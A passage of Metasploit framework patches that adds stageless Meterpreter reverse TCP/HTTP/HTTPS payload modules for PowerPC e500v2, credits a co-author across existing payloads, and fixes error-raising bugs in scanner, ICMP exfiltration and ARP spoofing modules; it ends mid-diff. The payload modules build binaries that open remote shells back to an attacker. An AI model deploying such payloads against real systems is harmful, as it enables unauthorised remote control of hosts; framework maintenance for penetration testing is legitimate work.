ARCH_ARMLE, diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb index 3149bcca28..e31c66b376 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_ARMLE, diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb index 1243e402de..8bd8a3cc05 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_ARMLE, diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb index dd9368b245..10f36f74d8 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_MIPS64, diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb index 8c34b01940..e0beb782fe 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_MIPS64, diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb index 8e0de4303b..c965638d7e 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_MIPS64, diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb index fdc9ad4109..d1749f9c25 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE, diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb index a5db786462..bc1d3f2c08 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE, diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb index da8aba961f..cc021b9ff2 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE, diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb index 21021201df..a98f452a62 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_MIPSLE, diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb index 4bd4e3818e..258bd4192f 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_MIPSLE, diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb index 3735553d80..78b4d6b8d7 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_MIPSLE, diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb index c18783c2b3..83aa882cc2 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_PPC, diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb index 651bc9c1b6..9b0c40b47f 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_PPC, diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb index d2771d7a0c..7832e02b38 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_PPC, diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb index 8baaf5149a..d7d893c797 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_PPC64LE, diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb index 8bfe23028d..43922b34f8 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_PPC64LE, diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb index 7f6980e6f7..28f1df859a 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_PPC64LE, diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb new file mode 100644 index 0000000000..17a4ad60cc --- /dev/null +++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb @@ -0,0 +1,44 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_http' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_ppce500v2_linux' + +module MetasploitModule + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ', + 'timwr' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_PPCE500V2, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttp, + 'Session' => Msf::Sessions::Meterpreter_ppce500v2_Linux + ) + ) + end + + def generate + opts = { + scheme: 'http', + stageless: true + } + MetasploitPayloads::Mettle.new('powerpc-e500v2-linux-musl', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb new file mode 100644 index 0000000000..345737bb79 --- /dev/null +++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb @@ -0,0 +1,44 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_https' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_ppce500v2_linux' + +module MetasploitModule + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ', + 'timwr' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_PPCE500V2, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttps, + 'Session' => Msf::Sessions::Meterpreter_ppce500v2_Linux + ) + ) + end + + def generate + opts = { + scheme: 'https', + stageless: true + } + MetasploitPayloads::Mettle.new('powerpc-e500v2-linux-musl', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb new file mode 100644 index 0000000000..2de9507578 --- /dev/null +++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb @@ -0,0 +1,44 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_tcp' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_ppce500v2_linux' + +module MetasploitModule + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ', + 'timwr' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_PPCE500V2, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::Meterpreter_ppce500v2_Linux + ) + ) + end + + def generate + opts = { + scheme: 'tcp', + stageless: true + } + MetasploitPayloads::Mettle.new('powerpc-e500v2-linux-musl', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb index 2c41b001e2..07d84a9546 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_X64, diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb index a89325ffbb..1b019f6ea9 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_X64, diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb index b5ace9bfeb..d039699b84 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_X64, diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb index 078ea923e9..af7e1d5c24 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_X86, diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb index a3f8085c2a..6ce43b87f7 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_X86, diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb index 3660fc5810..1f2fb19f4f 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_X86, diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb index e522b7c89c..c678a47d9e 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_ZARCH, diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb index ae31cc5abe..76be12d28d 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_ZARCH, diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb index 5e73f26542..85223495a7 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_ZARCH, diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb index cf4c1f6b81..a8d519d10c 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'osx', 'Arch' => ARCH_X64, diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb index c4f9172030..07bb971461 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'osx', 'Arch' => ARCH_X64, diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb index 82da65b261..d1eeb5d196 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'osx', 'Arch' => ARCH_X64, diff --git a/tools/modules/generate_mettle_payloads.rb b/tools/modules/generate_mettle_payloads.rb index 967a051b81..3e3c627562 100755 --- a/tools/modules/generate_mettle_payloads.rb +++ b/tools/modules/generate_mettle_payloads.rb @@ -12,18 +12,19 @@ schemes = [ ] arches = [ - ['aarch64','Linux', 'aarch64-linux-musl'], - ['armbe', 'Linux', 'armv5b-linux-musleabi'], - ['armle', 'Linux', 'armv5l-linux-musleabi'], - ['mips64', 'Linux', 'mips64-linux-muslsf'], - ['mipsbe', 'Linux', 'mips-linux-muslsf'], - ['mipsle', 'Linux', 'mipsel-linux-muslsf'], - ['ppc', 'Linux', 'powerpc-linux-muslsf'], - ['ppc64le','Linux', 'powerpc64le-linux-musl'], - ['x64', 'Linux', 'x86_64-linux-musl'], - ['x86', 'Linux', 'i486-linux-musl'], - ['zarch', 'Linux', 's390x-linux-musl'], - ['x64', 'OSX', 'x86_64-apple-darwin'], + ['aarch64', 'Linux', 'aarch64-linux-musl'], + ['armbe', 'Linux', 'armv5b-linux-musleabi'], + ['armle', 'Linux', 'armv5l-linux-musleabi'], + ['mips64', 'Linux', 'mips64-linux-muslsf'], + ['mipsbe', 'Linux', 'mips-linux-muslsf'], + ['mipsle', 'Linux', 'mipsel-linux-muslsf'], + ['ppc', 'Linux', 'powerpc-linux-muslsf'], + ['ppce500v2', 'Linux', 'powerpc-e500v2-linux-musl'], + ['ppc64le', 'Linux', 'powerpc64le-linux-musl'], + ['x64', 'Linux', 'x86_64-linux-musl'], + ['x86', 'Linux', 'i486-linux-musl'], + ['zarch', 'Linux', 's390x-linux-musl'], + ['x64', 'OSX', 'x86_64-apple-darwin'], ] arch = '' From f42b980cf02f5dc0f12610be84b267bae3e5e1c5 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 30 Oct 2017 15:42:11 -0500 Subject: [PATCH 071/254] fix misspelled RuntimeError --- lib/metasploit/framework/mssql/client.rb | 6 ++---- lib/msf/core/auxiliary/nmap.rb | 2 +- 2 files changed, 3 insertions(+), 5 deletions(-) diff --git a/lib/metasploit/framework/mssql/client.rb b/lib/metasploit/framework/mssql/client.rb index 4c79a8eb0e..9652c2ec79 100644 --- a/lib/metasploit/framework/mssql/client.rb +++ b/lib/metasploit/framework/mssql/client.rb @@ -634,8 +634,7 @@ module Metasploit if idx > 0 encryption_mode = resp[idx, 1].unpack("C")[0] else - raise RunTimeError, "Unable to parse encryption req. "\ - "from server during prelogin" + raise "Unable to parse encryption req during pre-login, this may not be a MSSQL server" encryption_mode = ENCRYPT_NOT_SUP end @@ -682,8 +681,7 @@ module Metasploit if idx > 0 encryption_mode = resp[idx, 1].unpack("C")[0] else - raise RuntimeError, "Unable to parse encryption "\ - "req during pre-login" + raise "Unable to parse encryption req during pre-login, this may not be a MSSQL server" end end encryption_mode diff --git a/lib/msf/core/auxiliary/nmap.rb b/lib/msf/core/auxiliary/nmap.rb index a966c8b1f1..0b434270c4 100644 --- a/lib/msf/core/auxiliary/nmap.rb +++ b/lib/msf/core/auxiliary/nmap.rb @@ -165,7 +165,7 @@ def nmap_add_ports if nmap_validate_arg(port_arg) self.nmap_args << port_arg else - raise RunTimeError, "Argument is invalid" + raise "Argument is invalid" end end From 9389052f612ef759754cdc3b3036b7da4a43a0b7 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 31 Oct 2017 04:45:19 -0500 Subject: [PATCH 072/254] fix more broken RuntimeError calls --- lib/msf/core/db_manager/report.rb | 6 +++--- modules/auxiliary/scanner/discovery/arp_sweep.rb | 4 ++-- modules/auxiliary/scanner/discovery/ipv6_neighbor.rb | 4 ++-- .../scanner/discovery/ipv6_neighbor_router_advertisement.rb | 4 ++-- modules/auxiliary/server/icmp_exfil.rb | 6 +++--- modules/auxiliary/spoof/arp/arp_poisoning.rb | 6 +++--- 6 files changed, 15 insertions(+), 15 deletions(-) diff --git a/lib/msf/core/db_manager/report.rb b/lib/msf/core/db_manager/report.rb index cb4ccb19ce..e8f8c5fcc2 100644 --- a/lib/msf/core/db_manager/report.rb +++ b/lib/msf/core/db_manager/report.rb @@ -44,7 +44,7 @@ module Msf::DBManager::Report unless artifact.valid? errors = artifact.errors.full_messages.join('; ') - raise RuntimeError "Artifact to be imported is not valid: #{errors}" + raise RuntimeError, "Artifact to be imported is not valid: #{errors}" end artifact.save end @@ -66,7 +66,7 @@ module Msf::DBManager::Report unless report.valid? errors = report.errors.full_messages.join('; ') - raise RuntimeError "Report to be imported is not valid: #{errors}" + raise RuntimeError, "Report to be imported is not valid: #{errors}" end report.state = :complete # Presume complete since it was exported report.save @@ -83,4 +83,4 @@ module Msf::DBManager::Report wspace.reports } end -end \ No newline at end of file +end diff --git a/modules/auxiliary/scanner/discovery/arp_sweep.rb b/modules/auxiliary/scanner/discovery/arp_sweep.rb index 45993f560b..d5155e9080 100644 --- a/modules/auxiliary/scanner/discovery/arp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/arp_sweep.rb @@ -46,11 +46,11 @@ class MetasploitModule < Msf::Auxiliary @interface = datastore['INTERFACE'] || Pcap.lookupdev shost = datastore['SHOST'] shost ||= get_ipv4_addr(@interface) if @netifaces - raise RuntimeError ,'SHOST should be defined' unless shost + raise RuntimeError, 'SHOST should be defined' unless shost smac = datastore['SMAC'] smac ||= get_mac(@interface) if @netifaces - raise RuntimeError ,'SMAC should be defined' unless smac + raise RuntimeError, 'SMAC should be defined' unless smac begin diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb index 00530de45c..169e2f8f06 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb @@ -49,11 +49,11 @@ class MetasploitModule < Msf::Auxiliary @interface = datastore['INTERFACE'] || Pcap.lookupdev @shost = datastore['SHOST'] @shost ||= get_ipv4_addr(@interface) if @netifaces - raise RuntimeError ,'SHOST should be defined' unless @shost + raise RuntimeError, 'SHOST should be defined' unless @shost @smac = datastore['SMAC'] @smac ||= get_mac(@interface) if @netifaces - raise RuntimeError ,'SMAC should be defined' unless @smac + raise RuntimeError, 'SMAC should be defined' unless @smac addrs = [] diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb index cbf01588c4..7651904f8f 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb @@ -161,12 +161,12 @@ class MetasploitModule < Msf::Auxiliary @interface = datastore['INTERFACE'] || Pcap.lookupdev @shost = datastore['SHOST'] @shost ||= get_ipv4_addr(@interface) if @netifaces - raise RuntimeError ,'SHOST should be defined' unless @shost + raise RuntimeError, 'SHOST should be defined' unless @shost @smac = datastore['SMAC'] @smac ||= get_mac(@interface) if @netifaces @smac ||= ipv6_mac - raise RuntimeError ,'SMAC should be defined' unless @smac + raise RuntimeError, 'SMAC should be defined' unless @smac # Send router advertisement print_status("Sending router advertisement...") diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb index f51b978acc..a05fd7d2b9 100644 --- a/modules/auxiliary/server/icmp_exfil.rb +++ b/modules/auxiliary/server/icmp_exfil.rb @@ -153,7 +153,7 @@ class MetasploitModule < Msf::Auxiliary icmp_response, contents = icmp_packet(packet, datastore['RESP_START']) if not icmp_response - raise RuntimeError ,"Could not build ICMP response" + raise RuntimeError, "Could not build ICMP response" else # send response packet icmp_pkt send_icmp(icmp_response, contents) @@ -172,7 +172,7 @@ class MetasploitModule < Msf::Auxiliary icmp_response, contents = icmp_packet(packet, datastore['RESP_END']) if not icmp_response - raise RuntimeError , "Could not build ICMP response" + raise RuntimeError, "Could not build ICMP response" else # send response packet icmp_pkt send_icmp(icmp_response, contents) @@ -192,7 +192,7 @@ class MetasploitModule < Msf::Auxiliary icmp_response, contents = icmp_packet(packet, datastore['RESP_CONT']) if not icmp_response - raise RuntimeError , "Could not build ICMP response" + raise RuntimeError, "Could not build ICMP response" else # send response packet icmp_pkt send_icmp(icmp_response, contents) diff --git a/modules/auxiliary/spoof/arp/arp_poisoning.rb b/modules/auxiliary/spoof/arp/arp_poisoning.rb index d79ce44402..4a1022617a 100644 --- a/modules/auxiliary/spoof/arp/arp_poisoning.rb +++ 